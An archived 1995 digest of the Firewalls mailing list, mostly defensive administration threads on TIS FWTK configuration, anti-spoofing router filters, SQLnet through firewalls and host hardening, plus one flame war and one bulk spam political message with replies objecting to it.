hestia.ccs.deakin.edu.au (8.6.11/8.6.11) with ESMTP id LAA17374 for ; Tue, 10 Oct 1995 11:38:46 +1000 Received: (couldrey@localhost) by mensa.ccs.deakin.edu.au (8.6.11/8.6.11) id LAA13711; Tue, 10 Oct 1995 11:38:43 +1000 Date: Tue, 10 Oct 1995 11:38:42 +1000 (EST) From: Benno X-Sender: couldrey@mensa To: Firewalls@GreatCircle.COM Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Mon Oct 9 19:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA02112 for firewalls-outgoing; Mon, 9 Oct 1995 19:25:23 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA02105 for ; Mon, 9 Oct 1995 19:25:16 -0700 Received: (from alan@localhost) by westie.mid.net (8.6.10/8.6.9) id VAA09657; Mon, 9 Oct 1995 21:23:40 -0500 From: Alan Hannan Message-Id: <199510100223.VAA09657@westie.mid.net> Subject: Re: new firewall book (Chapman & Zwicky) To: Wilner@DOCKMASTER.NCSC.MIL Date: Mon, 9 Oct 1995 21:23:39 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <951009234916.486639@DOCKMASTER.NCSC.MIL> from "Wilner@DOCKMASTER.NCSC.MIL" at Oct 9, 95 07:49:00 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2715 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It is unfortunate you brought your petty flamefest to the public, Wilner. Your rationale of insulting me because I don't feel your areas of study (perhaps expertise, from what you say) are topical for Firewalls is quite immature. My point in our discussion was that the things you work on are not directly related to the things most of us are interested in. I think you're just sad that noone is as incredibly intelligent as yourself. Perhaps because most of are busy actually doing useful things for the real world, instead of trying to invent proprietary standards for our superiors so we can institute more useless regulations. However, that would be arguing on principles, and not out of context, so perhaps I should return the favor: Wil> At the risk of sounding arrogant, this is one of the most Wil> lightweight, ill-structured arguments I have encountered. Wil> Firewalling does not read "separating networks according to a Wil> given security policy": it reads "slap together a few quick Wil> fixes and some value-added code and tell people it's secure." - in reference to TIS's Gauntlet Firewall System We don't claim to play perfection, Mr. Theorist. We live in the real world. Wil> This is just the Wil> kind of sophomoric flaming I would expect from a system Wil> administrator who fancies himself a NETSEC expert because he Wil> can transmit bytes to the same forum as the Big Boys. No, these are the thoughts from someone who has 4 job titles, works in the real world, and has over 16 very satisfied customers who are very pleased with the performance and security of their firewalls. We don't pretend to be able to make the world's computer network a safe place. Only safer. Below's quote is indeed a bit paradoxical, nonetheless. it is true. When I say they are required knowledge, I mean that I know that a system is safe _enough_. As well, we could focus on the smaller component of firewall theory, that being that the host on which the network separation mechanism must be secure. However, I am comfortable with the safety of my platforms, and feel that the study of the OSes hardness should take place over in Bugtraq. ......... Wilner@DOCKMASTER.NCSC.MIL is rumored to have said: ] ] ] Hannan writes: ] ] > True, both of these [high-assurance trusted platforms or ] > formal modeling of TCP/IP protocols] are required knowledge ] > for firewalling, and also subsets of firewall theory. ] ] My learned colleague's assertion speaks for itself. ] ] -- Alan Hannan http://www.mid.net/~alan 402/472-0239 Network Systems/Security Administrator MIDnet, Inc. From firewalls-owner Mon Oct 9 22:31:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA03616 for firewalls-outgoing; Mon, 9 Oct 1995 22:21:12 -0700 Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA03608 for ; Mon, 9 Oct 1995 22:20:56 -0700 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA22806 (5.67a/IDA-1.5 for ); Tue, 10 Oct 1995 13:19:03 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA00403; Tue, 10 Oct 95 12:42:14 MYT Date: Tue, 10 Oct 1995 12:37:47 +0800 (MYT) From: Tham Huei Hwan Subject: TIS 1.3 tn-gw configuration To: firewalls Cc: tis_user Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Recently, I have installted and configured tis 1.3 on my server. Whwn I try to telnet to this hosts, it gives me the following messages:- nicky% telnet netra Trying 192.9.201.80 ... Connected to netra. Escape character is '^]'. netra telnet proxy (Version V1.3) ready: Lost connection to authentication server Connection closed by foreign host. someone have any idea what is going wrong on me configuration. From firewalls-owner Mon Oct 9 22:47:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA04416 for firewalls-outgoing; Mon, 9 Oct 1995 22:41:45 -0700 Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA21470 for ; Mon, 9 Oct 1995 12:56:06 -0700 Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA29456; Mon, 9 Oct 1995 15:50:39 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA813279671; Mon, 09 Oct 95 15:58:37 EST Date: Mon, 09 Oct 95 15:58:37 EST From: "Jim Meritt" Message-Id: <9509098132.AA813279671@smtpinet.aspensys.com> To: firewalls@greatcircle.com Subject: tcp_wrapper banner example content-length: 230 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have an example of what the banner rule looks like for tcp_wrapper (for in the .etc.hosts.deny) for people to read when they get refused connection? How about wu-ftp? Jim Meritt From firewalls-owner Tue Oct 10 02:12:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA08965 for firewalls-outgoing; Tue, 10 Oct 1995 02:07:53 -0700 Received: from blackice (blackice.winternet.com [198.174.169.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA08958 for ; Tue, 10 Oct 1995 02:07:48 -0700 Received: (from root@localhost) by blackice (8.6.12/8.6.12) id EAA20402; Tue, 10 Oct 1995 04:05:51 -0500 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by blackice (8.6.12/8.6.12) with ESMTP id RAA24031 for ; Mon, 9 Oct 1995 17:07:44 -0500 Posted-Date: Mon, 9 Oct 1995 17:07:44 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzktj25773; Mon, 9 Oct 1995 17:57:38 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA23939 for firewalls-outgoing; Mon, 9 Oct 1995 14:18:38 -0700 Received: from bramber.windsor.com (bramber.windsor.com [199.181.96.54]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA23932 for ; Mon, 9 Oct 1995 14:18:35 -0700 Received: (from erics@localhost) by bramber.windsor.com (8.6.12/8.6.12) id RAA03630; Mon, 9 Oct 1995 17:17:12 -0400 From: "Eric V. Smith" Message-Id: <199510092117.RAA03630@bramber.windsor.com> Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Mon, 9 Oct 1995 17:17:12 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510091912.AA30560@wisdom.home.vix.com> from "Paul A Vixie" at Oct 9, 95 12:12:55 pm Reply-To: EricSmith@windsor.com X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 832 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul A Vixie wrote: > > > Doesn't this assume that the smart DNS server knows which of these > > protocols is being requested for each address, so that it knows which > > proxy to start up on the socket it created? Or am I missing something? > > yes, or it requires a kernel with a preemptive icmp socket. Sorry, I didn't make my question obvious. How does the DNS server know if a request for the name foo.bar.com is for FTP, telnet, finger, or whatever? I assume it could tell SMTP by an MX request, but what about the others? -- Eric V. Smith | Some for renown on scraps of learning dote, EricSmith@windsor.com | And think they grow immortal as they quote. Windsor Software Corp +----------------------------------+ Edward Young http://www.windsor.com/ Windows NT, Unix, SQL Server | English poet From firewalls-owner Tue Oct 10 02:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09147 for firewalls-outgoing; Tue, 10 Oct 1995 02:24:40 -0700 Received: from hydra.dra.hmg.gb (hydra.dra.hmg.gb [192.5.29.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA09137 for ; Tue, 10 Oct 1995 02:24:35 -0700 Message-Id: <199510100924.CAA09137@miles.greatcircle.com> Received: from woodpc.dra.hmg.gb by hydra.dra.hmg.gb with SMTP ; Tue, 10 Oct 95 10:20:42 GMT X-Sender: jwood@hydra.dra.hmg.gb X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 10 Oct 1995 10:20:33 +0100 To: bell@mail06.mitre.org (D. Elliott Bell), firewalls@GreatCircle.COM From: jwood@hydra.dra.hmg.gb (John Wood) Subject: Re: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:34 09/10/95 -0400, D. Elliott Bell wrote: >Windows NT received its B1 rating late this summer. Not B2. > Surely not?? To get a B rating, Windows NT would have to support labels. Could you please quote your evidence for this statement? I believe that C2 was the rating achieved. John From firewalls-owner Tue Oct 10 02:42:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09046 for firewalls-outgoing; Tue, 10 Oct 1995 02:16:03 -0700 Received: from gateway.mdf.com (gateway.mdf.com [194.64.29.162]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA09039 for ; Tue, 10 Oct 1995 02:15:56 -0700 Received: from asterix.logsoft.mdf.com (asterix.logsoft.mdf.com [145.230.24.94]) by gateway.mdf.com (8.6.11/8.6.9) with ESMTP id KAA07188; Tue, 10 Oct 1995 10:10:05 +0100 Received: (from dw@localhost) by asterix.logsoft.mdf.com (8.6.11/8.6.9) id JAA06955; Tue, 10 Oct 1995 09:57:59 +0100 From: David Wasser Message-Id: <199510100857.JAA06955@asterix.logsoft.mdf.com> Subject: Re: FWTK ftp-gw, http-gw under Linux To: Firewalls@GreatCircle.COM Date: Tue, 10 Oct 1995 09:57:58 +0100 (MET) Cc: ghume@cybergraphic.com.au In-Reply-To: <199510082031.NAA21070@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Oct 8, 95 01:31:07 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1682 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greg Hume screamed for help with the following problem: > > Hi all, > > We are at his moment attempting to find the cause to a problem with > FWTK 1.3. The FTP-GW and HTTP-GW are the services we have configured > so far. Each time we start the service by connecting to the > server/firewall we are getting "Statically Linked" messages. The > messages appear in the log files and on telnet sessions when we telnet > to the gw service ports. We think it may be an environment problem but > cannot pin it down. > > The authsvr has successfully been compiled with linking forced to be > dynamic or static. The gw apps appear work fine in debug mode. > > Any help/advise would be welcome. I really don't wish to scrog the hd > and rebuild from aaaaaAAARGH. > The problem is not in ftp-gw or http-gw. The problem is in your inetd.conf. The sample inetd.conf from TIS doesn't work under Linux (I don't know why). The inetd is not setting up the argv/argc properly when it calls ftp-gw and this causes ftp-gw to hiccup. All you hafta do is add the name of the executable to the end of the configuration line in inetd.conf, which gets passed to ftp-gw as argv[0]. Like this: ftp stream tcp nowait root /usr/sbin/ftp-gw /usr/sbin/ftp-gw # ^^^^^^^^^^^^^^^^ # this gets passed to ftp-gw as argv[0] Substitute whatever directory you use for /usr/sbin. I fought almost half a day with this one. Thought I had really messed up! -DWass Mannesmann Demag Foerdertechnik Offenbach, Germany From firewalls-owner Tue Oct 10 04:12:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA11496 for firewalls-outgoing; Tue, 10 Oct 1995 04:02:38 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA11489 for ; Tue, 10 Oct 1995 04:02:32 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id FAA26280 for firewalls@greatcircle.com; Tue, 10 Oct 1995 05:04:39 -0600 Date: Tue, 10 Oct 1995 05:04:39 -0600 From: Danny Boulet Message-Id: <199510101104.FAA26280@nahanni.BouletFermat.ab.ca> To: firewalls@greatcircle.com Subject: Typo in "where to get ipfirewall" description . . . Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The ftp URL's in my recent note on ipfirewall v2.0d are wrong. The correct URL's are: ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0d.shar.gz ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0d.shar.gz Sigh! -Danny From firewalls-owner Tue Oct 10 04:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA11604 for firewalls-outgoing; Tue, 10 Oct 1995 04:11:57 -0700 Received: from telemann.inoc.dl.nec.com (telemann.inoc.dl.nec.com [143.101.112.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA11597 for ; Tue, 10 Oct 1995 04:11:53 -0700 Received: by telemann.inoc.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id GAA08829(telemann.inoc.dl.nec.com); Tue, 10 Oct 1995 06:09:59 -0500 Received: by texas.syl.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id GAA21419(texas.syl.dl.nec.com); Tue, 10 Oct 1995 06:09:57 -0500 To: firewalls@GreatCircle.com Date: Mon, 09 Oct 1995 04:15:12 +0100 From: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) Message-ID: Organization: SpAmKiNg Has Low Cost Bulk E Mail Rates! (505) 821-1945 Path: syl.dl.nec.com!vivaldi.inoc.dl.nec.com!seas.smu.edu!news01.aud.alcatel.com!gatech!news.mathworks.com!newsfeed.internetmci.com!EU.net!Germany.EU.net!informatik.tu-muenchen.de!lrz-muenchen.de!news.informatik.uni-muenchen.de!news.muc.de!mystery.muc.de!newsgate Subject: WE THE PEOPLE "....want the facts to make informed intelligent decisions" Newsgroups: muc.lists.netbsd.portable-ppp,muc.lists.netbsd.ports,muc.lists.netbsd.source-changes,muc.lists.netbsd.tech.install,muc.lists.netbsd.tech.kern,muc.lists.netbsd.tech.misc,muc.lists.netbsd.tech.net,muc.lists.netbsd.tech.ports,muc.lists.netbsd.tech.userlevel,muc.lists.netbsd.users,muc.lists.ntk,muc.lists.osf-managers,muc.lists.soziologie,muc.market,muc.misc,muc.rec,muc.verkehr,mucev.lists.asus-boards,nbg.general,nctu.ac.general,nctu.adm.alumni-center,ne.config,ne.general.selected,ne.internet.services,ne.jobs.contract,ne.transportation,ne.weather,necus.internet.announce,necus.internet.mirror.big-linux,necus.internet.mirror.firewalls,news.admin.hierarchies,news.admin.misc Sender: firewalls-owner@GreatCircle.COM Precedence: bulk WE THE PEOPLE "....want the facts to make informed intelligent decisions" "If members of our society were empowered to make their own decisions...then the whole rationale for the agency would cease to exist."- Dr. David Kessler, - Food & Drug Administration "Commissioner" Our focus for the upcoming political races is the preservation of the 1st amendment of the constitutional "Bill of Rights". The fact that you can freely read this letter is due to the 1st amendment. Some people in our government feel that we need to be regulated in the way we use this forum to gather & share information. We need this forum so that all points of view can be shared freely without threat of persecution........Remember Ruby Ridge, Waco.... The future of our country is a stake. Seek out and elect local, state & federal officials who will uphold your right to freely gather and disperse information in all or any forms be they electronic written or otherwise. Amendment 1 Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press, or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances. Did the founding fathers intend for us to be enslaved in regulatory law ? NO! If you share in the belief that the founding fathers never intended that we should be at the mercy of government to decide if we are able to handle the responsibility of making informed intelligent decisions, then seek out candidates who will promise to uphold our constitutional rights, support those candidates that promise to vote against any legislation that infringes on the 1st amendment rights of any citizen of this great country. The future freedom of all people rest in the actions we will take now. "Independent" candidates who seek our support please submit your agenda to us at the address below. A nice size bumper sticker with a flattering picture of "Commissioner " Kessler with his famed quote, "If members..." is available Send $10.00 for (2) including p&h, to our address below.(share one with a friend) If you would like to support our work please send two dollars to: "We The People" 5505 Connecticut Ave. NW Suite 245 Washington, DC 20015-2601 -- PLEASE RESPOND DIRECTLY TO THE ADVERTISER. THIS MESSAGE BROUGHT TO YOU BY THE SpAmKiNg Call SpAmKiNg for the BEST BULK-E MAIL RATES! You can now reach over 6 MILLION + Internet subcribers for a low cost of $425.00. (I will post your message to 2.5 MILLION GOOD E-MAIL ADDRESSES, minimum of 9500 + USENET NEWS GROUPS AND 1400 LIST SERVE MAILING LISTS) Satisfaction IS Guaranteed! ASK about my Special Monthly, Bi Monthly, and Weekly rates. **SPECIAL RATES TO 501 C 3 NON PROFITS.** Call the SpAmKiNg at (505) 821-1945 voice mail. Please leave your NAME, ADDRESS & PHONE NUMBER. I will return your call. Sorry, incomplete information will not receive a response. From firewalls-owner Tue Oct 10 05:12:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13744 for firewalls-outgoing; Tue, 10 Oct 1995 05:11:26 -0700 Received: from freelunch.freenet.kiev.ua (freelunch.freenet.kiev.ua [194.44.28.250]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA13723 for ; Tue, 10 Oct 1995 05:11:08 -0700 Received: (from serge@localhost) by freelunch.freenet.kiev.ua (8.6.12/osf3.2xla) id OAA00772; Tue, 10 Oct 1995 14:10:16 +0200 Date: Tue, 10 Oct 1995 14:10:16 +0200 (EET) From: Sergey Zhuk To: Firewalls@GreatCircle.COM Subject: IP seq. number attacks In-Reply-To: <199510091902.MAA19122@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi i'm using extended access list filters on external interfaces to prevent subj. But it's still one problem: if you have addr. from _your_ subnet addr. on remote end (your providers' router) you should permit packets from this address, which are coming from external (for your network) interface. This is true at least when i'm exchanging routing information with that host: ------I2 ------------ R1 |--------| R external|------Internet ----- ----------- |I1 | ---- LAN| --- R1 - router for my site R external - router of my provider I1 - internal (LAN) interface I2 - external interface. Suppose I2 has IP addr: xx.xx.xx.128 netmask 255.255.255.224 and I2 on R external has IP addr: xx.xx.xx.129 netmask 255.255.255.224, I1 has IP addr: xx.xx.xx.69 netmask 255.255.255.224. So i have different subnets of network xx.xx.xx.0, assigned to diff. interfaces. I can prevent incoming packets from R external with source address xx.xx.xx.0 0.0.0.255 any but i should permit xx.xx.xx.129 0.0.0.0 thus permitting subj. from at least one address. Sure that's better than subj from any of 254 addresses, but what a hell ;). Any suggestions ? Another thing: ICMP redirects, whom i can trust and how to setup properly access list for this. I've found at least 3 types of ICMP redirects mentioned in CISCO docs... rgds, serge -- +-------------------------------------+-------------------------------------+ | Sergey Zhuk | serge@freenet.kiev.ua | | UN Internet Project | +380-44-228-6393 | | System and Network Administrator | www.freenet.kiev.ua, www.un.kiev.ua | +-------------------------------------+-------------------------------------+ From firewalls-owner Tue Oct 10 05:43:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14212 for firewalls-outgoing; Tue, 10 Oct 1995 05:31:22 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14205; Tue, 10 Oct 1995 05:31:19 -0700 Message-Id: <199510101231.FAA14205@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA183948127; Tue, 10 Oct 1995 08:28:47 -0400 Date: Tue, 10 Oct 1995 08:28:47 -0400 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: Oracle <-> Firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: David Schnardthorst > Subject: Oracle <-> Firewall > > Does anybody know of a way to get Oracle Information through a Firewall? > > We are setting up a firewall, with our Web Servers on the outside, however > we need to pass some information from an Oracle Database through the firewall > to the outside Web Servers. > > Has anybody done this, and if so, could you please give me some ideas of > how to accomplish this. > I asked this about a month ago and haven't summarized so I'll do so now. There is no proxy version of SQLnet or its overlying applications. Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a filtering router to pass SQLnet. Five or six people gave me the same answer. There are probably two ways to do a SQLnet proxy. The first would be to build a lot of intelligence into the proxy itself that could understand what actions on what databases by what user was being requested. The second would be to provide an API to SQLnet based applications that allowed for things like querying for authentication information. In either case, Oracle would have to do it and the second case would involve modification of lots of applications. Just idle speculation on my part :-) From firewalls-owner Tue Oct 10 07:09:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16231 for firewalls-outgoing; Tue, 10 Oct 1995 06:57:31 -0700 Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16224 for ; Tue, 10 Oct 1995 06:57:28 -0700 Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA10983; Tue, 10 Oct 1995 09:51:22 +0500 Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA813344403; Tue, 10 Oct 95 09:59:26 EST Date: Tue, 10 Oct 95 09:59:26 EST From: "Jim Meritt" Message-Id: <9509108133.AA813344403@smtpinet.aspensys.com> To: firewalls@greatcircle.com Subject: rje on port 77 content-length: 145 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is it and do I need/want it or should I zap it? I was looking in the /etc/services and it is new to me. Jim Meritt From firewalls-owner Tue Oct 10 07:15:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15960 for firewalls-outgoing; Tue, 10 Oct 1995 06:45:18 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA15953 for ; Tue, 10 Oct 1995 06:45:05 -0700 Message-Id: <199510101345.GAA15953@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA287572565; Tue, 10 Oct 1995 23:42:45 +1000 From: Darren Reed Subject: Private insecure networks... To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Tue, 10 Oct 1995 23:42:45 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1317 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Whilst not directly relevant to firewalls, I feel that people here should be aware of this, if they're not already. An article in a local paper today described the local Telco's desire to setup a "private" international version of the Internet, for business only. It is currently known as "Netware Connect Services" (NCS). It is aimed at carrying IPX, IP and use Novell's NDS as a directory service. The security will be provieded by Netware's access control system. You may have to enter upto three passwords to get into an area described as being "highly secure". The local company (Telstra) is joining with Japan's NTT, Unisource (Europe), AT&T and Deustche Telekom. This scares me a lot. If what I read is true, then it shows total ignorance of the problems being faced by the Internet and the assumption if we go somewhere else, the problems won't follow us. I hope that they all realise that the need to construct and maintain a firewall connection to this network is just as important, if not more (their competitors as well as partners are here too!). That is unless Netware use Kerberos style network authentication or one time passwords as part of the standard operating system login, when done over the network.. Does anyone have any more details ? Is this just more newspaper trash ? darren From firewalls-owner Tue Oct 10 07:30:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA17267 for firewalls-outgoing; Tue, 10 Oct 1995 07:21:02 -0700 Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA17260 for ; Tue, 10 Oct 1995 07:20:59 -0700 Received: from GWFX1.sysorex.com (gwfx1.sysorex.com [204.192.18.20]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id KAA08051; Tue, 10 Oct 1995 10:19:02 -0400 Received: from ccMail by GWFX1.sysorex.com (SMTPLINK V2.10.08) id AA813345584; Tue, 10 Oct 95 10:15:57 EST Date: Tue, 10 Oct 95 10:15:57 EST From: "Dave Druitt" Encoding: 13 Text Message-Id: <9509108133.AA813345584@GWFX1.sysorex.com> To: firewalls@GreatCircle.com, SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) Subject: Re: WE THE PEOPLE "....want the facts to make informed intel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Spam mistakenly wrote: >Subject: WE THE PEOPLE "....want the facts to make informed intellige >Author: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) at GWFX1 >Date: 10/10/95 7:44 AM If I had any interest in this cause before, I lost it with this intrusive invasion of my privacy. Dave Druitt ________________________ 'Let's be free of all influences, good and bad. Then we can make up our own minds...' ANONYMOUS From firewalls-owner Tue Oct 10 08:45:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20261 for firewalls-outgoing; Tue, 10 Oct 1995 08:34:04 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA20254 for ; Tue, 10 Oct 1995 08:34:01 -0700 Received: from dns.eng.auburn.edu by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id IAA15074; Tue, 10 Oct 1995 08:24:53 -0700 Received: from camel.eng.auburn.edu.eng.auburn.edu (20663@camel.eng.auburn.edu [131.204.31.21]) by dns.eng.auburn.edu (8.6.12/8.6.4) with SMTP id KAA20874; Tue, 10 Oct 1995 10:29:30 -0500 Received: by camel.eng.auburn.edu.eng.auburn.edu (4.1/SMI-4.1) id AA16452; Tue, 10 Oct 95 10:29:20 CDT Date: Tue, 10 Oct 1995 10:29:19 -0500 (CDT) From: Doug Hughes To: Jim Meritt Cc: firewalls@GreatCircle.COM Subject: Re: rje on port 77 In-Reply-To: <9509108133.AA813344403@smtpinet.aspensys.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 10 Oct 1995, Jim Meritt wrote: > What is it and do I need/want it or should I zap it? I was looking in > the /etc/services and it is new to me. > > Jim Meritt > Either zap it or put a trap on it. I put a trap on mind that alerts me if a foreign host tries to access it. See http://www.eng.auburn.edu/users/doug/second.html for details. ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" From firewalls-owner Tue Oct 10 09:47:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22520 for firewalls-outgoing; Tue, 10 Oct 1995 09:34:29 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA22507; Tue, 10 Oct 1995 09:34:23 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 10 Oct 1995 09:33:53 -0800 To: firewalls@GreatCircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: WE THE PEOPLE "....want the facts to make informed intel Cc: mcb@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Spam mistakenly wrote: >Subject: WE THE PEOPLE "....want the facts to make informed intellige >Author: SpAmKiNg@free.org (SpamKing_Low_Cost_Bulk_E_Mail) at GWFX1 >Date: 10/10/95 7:44 AM Folks, the best way to deal with spam on a mailing list is to bring it to the attention of the list management (believe me, we know about this one already), and then ignore it. Don't give them any followups; it only draws more attention to their BS. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Tue Oct 10 10:01:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA22595 for firewalls-outgoing; Tue, 10 Oct 1995 09:36:24 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA22588 for ; Tue, 10 Oct 1995 09:36:21 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id LAA23133; Tue, 10 Oct 1995 11:34:08 -0500 Message-Id: <199510101634.LAA23133@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 10 Oct 1995 11:34:05 -0500 To: Dana Brewer , Danny Boulet From: lpierce@intex.net (S. Lane Pierce) Subject: Re: Firewall on RS/6K Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:03 PM 10/9/95 -0500, Dana Brewer wrote: >We're looking into installing a "firewall" on our RS/6k. We don't have >the budget to buy any of the software packages that I see mentioned on >this list. What are some of the things that we can do cheaply (free is >even better) to make the machine more secure? [.sig snipped] First and foremost, contact IBM for a complete list of patches (esp. those related to security) and apply them. Secondly, disable network services you do not require. And thirdly, evaluate your host based security. Obtain and run crack, cops, satan, etc. and respond 